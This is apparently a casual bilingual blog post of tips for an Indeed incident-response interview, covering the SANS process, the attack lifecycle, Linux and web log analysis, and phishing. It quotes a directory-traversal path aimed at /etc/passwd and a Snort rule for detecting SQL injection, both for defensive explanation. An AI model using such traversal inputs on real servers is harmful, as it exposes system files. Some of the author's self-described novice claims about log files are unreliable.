First of all, congratulations!! finally !! onsite!!! fight!!!!
I am a full-stack engineer who is trying to get into the security area, so just applied the Incident Response Position to Indeed.
Before the interview, I totally have no idea what to prepare. And before the last minutes of the interview, I still reviewing the penetrating stuff which is never mentioned in the interview 😂.
So hope this article will help you to get some idea for the preparation.
And this article is for my friend who is gonna taking the onsite interview this week; meanwhile, I just finished the interview last week
that the article might not that well be organised with a super casual tone
I have never learned anything about incident responses before the interview, the ideas are the thing I read in these few days. So, the answers below might not be the best answer, just kinda the example of the train of thought.
This is never being as criteria or guidelines or a standard I am even still waiting for the offer ☺
If you still got 10 days to prepare, highly recommend you to read the book - 网络安全应急响应技术实战指南
All of the questions can be answered in the book. (((Didn't find the English version but will find one during the Xmas? 🤪 )
- Know the incident response process ( Very Important )
- The basic processes of the incident response (Indeed are following SANS)
- Understand how to containment the hacking and malware
- Understand the mendiant attack lifecycle & combine with the incident response process also the containment
- Snort Rule
- They would not ask you to write rule code but need to understand what is the rule for.
- Linux Log
- ((( Indeed is still using data centres, so the Linux log was mentioned several times in the interview )))
- Log of the actions
- current processes usages
- current memory usages
- how to detect the malware
- SSH Access & Apache Log
- Understand does the server was accessed
- API Log
- Understand if the API was hacked by directory traversal & if the hacker get data & what's their target & next step
- Combine with the mendiant attack lifecycle
- Phishing Email
- Determine if the email is a phishing email
- The consequence response of the situation that the users download the malware & executed the files
- OWASP Top 10
- SQL Injection
- XSS
- PHP & Apache
- eval
- local include
- remote include
Do not take the interview in an early morning
First of all, congratulations to the onsite interview cycle.
Cause the covid-19 and the incident response team members are almost in the states.
The onsite interview will be sperate into 6 sections ( Phishing / Alert Analysis and Detection / Log Analysis / Major IR / team culture / manager )
No matter which topics, all of the questions are log reading -> identifying -> containment.
Whatever the sections, the questions are all in this logic, but using different logs.
Ex:
- phishing -> mail log
- alert -> network log
- log -> linux log & API log
- Magor IR -> Apache Log & API Log or etc.
The team are not expecting the candidate doesn't have any incident response knowledge,
but almost all of the question will rotate back to the incident response process...
A tip for answering the question is that forget all of the modern structure thing Ex WAF, RDS, LB, Kubernetes, Docker, Snapshot, Datadog, Cloud Watch, L, Distributing Counting, Separated Front/Backend, etc...
Event forget those meaningful IP address such as 1.1.1.1 or 8.8.8.8 Those are just example IP
But don't forget the monolithic server with Apache which rendering the front in server and the framework such as CodeIgniter, CakePHP, or Django(the old version)
Keep the structure in your mind as simple as possible, it would help you to answer.
The team culture is quite a casual talk. The interviewers are the security team members in Tokyo.
And the security team in Tokyo is quite a small team, so you will work with them quite a lot. (They said that 😂)
About the conversation to the manger ... TBH... I don't really remember what we speak...
Cause the interview before the manager was until 1 am ... and the manage meeting was 8 am ...😂
So here is a tip Never have the interview in the early morning. Seriously. 😂
Understand the mendiant attack lifecycle & combine the incident response process that knowing how to deal with the situation and contain the situation
The graph below is the basic process of the Incident Response
In the interview, it would be better to keep the graph in the mind all the time.
Make sure which now in what status and what the actions are, also consider what the next actions are.
(( I thought they will just ask me the meaning of each step before the interview, but too silly and naive
For example, in identifying, understand what the attacks are, what the hackers might get, succeed or not.
Thought, before the interview... they always said: No worry about you don't know the incident response,
But the truth is, if you don't know, it is impossible to answer the question 😂😂😂😂
So memorise it.
Literally, this is attack Mental model
When hackers crack the wall and invade the system. The Lifecycle is giving a mindset to get the next step and get the target.
Basically, there are two points:
- ensure the way to come back the servers
- keep escalating the privileges
在回答問題的時候,你總是好去思考,這個攻擊到了什麼地步,他有沒有提升權限了,怎麼查他有沒有提升權限
例如:當你看到了一個 `../../../../../../passwd 的文件被 Access 了之後, 你要能想到,Hacker 能知道【誰】擁有了【什麼權限】, 或其實 Hacker 什麼都不能幹嘛。
((( 因為 Linux 已經把 Password 移到 etc/shadow 了...所以雖然是 passwd 但其實沒有 passwd,如果不知道的話,就只能猜那裡面有 Password 了啊!誰叫他叫那個名字!!)))
進而去看有沒有辦法找到什麼密碼或是什麼途徑可以去的權限
從一個 普通權限 -> 管理層權限 這就是個權限提升
如果 Hacker 得到了權限提升之後,Incident Response 的 Process 就不一樣了
怎麼去應對怎麼去 Contain 就是實際在問考官,他會給你更詳細的步驟
其實不只 Major IR 會問到這一塊,其他 Section 雖然表面是說讓你看 Log,但其實這個模型會持續出現
所以下面我們再來看遇到每個狀況怎麼回答吧
Quite wanna complain to the interviewers when being asked to the question ((hey~~~ I'm software engineer, I do CloudWatch murmur 🤣 ))
And I am a mac user, and I said maybe check the Activity Monitor and blah blah blah... and the
but still was asked to answer the Linux command line...
So guys and girls, be prepared
giving you a mind map, ex: is any extra users were added or any unknown processes are executed.
The interviewers might say ` hey, here is a 5GB log files, how will you find out if the laptop hacked or not".
This website has the explanation the meaning of the majority logs then follow that mindset ( Ex: unknown users or the unknown process )
Ex /var/log/cups shows what programmes are executed. and /var/log/utmp can find out any weird access
BTW the interviewers are not really wanna have the answer about using Python or Redis to analysis the log
It will be better to memorise some the basic Linux commands ex: find, grep, cat, egrep, awk, sed
As a Mac users ag bat or fd might come to your mind ... but don't forget that they are not on Linux 😌
They might not ask you the params after the find,
but what to know is much important.
Here are the materials to check the logs
另外當你的服務器被入侵時,你不能直接關閉服務器,只能在 Sever 繼續運行的狀態下排查和對應
你該怎麼辦?
FullStack 應該很直覺就.. 我再開一個 ECS 的 Container 改個 Terraform 的 Param 然後重新 Deploy Code 就好了啊
這個絕對不是他們想要的答案.........
Indeed 大部分的 Service 還是在 Data Center (唯一一個我記得我問了 Manager 什麼的地方 😌 )
不太可能直接跑去 Data Center 做這種事( 也不像不像東京的 Data Center 從赤坂搭15分鐘的車就會到 )
基本上還是剛剛的思路例如:
什麼 IP 入侵了我 -> 什麼 Port / 是否能關掉 -> 【是否權限被提升了】 或 【有新管道】-> 移除管道
The question will look like the logs in this video https://youtu.be/ZmVOGVbnYvo or https://youtu.be/UVpu78B1pWQ
In this section, the interviewer will give you several detection rules which looks like the following snort rule
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
msg:"SQL use of concat function with select - likely SQL injection";
flow:to_server,established;
http_uri; content:"SELECT ",nocase; content:"CONCAT|28|",within 100,nocase;
metadata:policy max-detect-ips drop,policy security-ips drop; service:http;
reference:url,ferruh.mavituna.com/sql-injection-cheatsheet-oku/;
classtype:web-application-attack; sid:24172; rev:2;
)
This is not the interview question, just an example from Snort Example
The rule can be easy to understand with the explanation in this site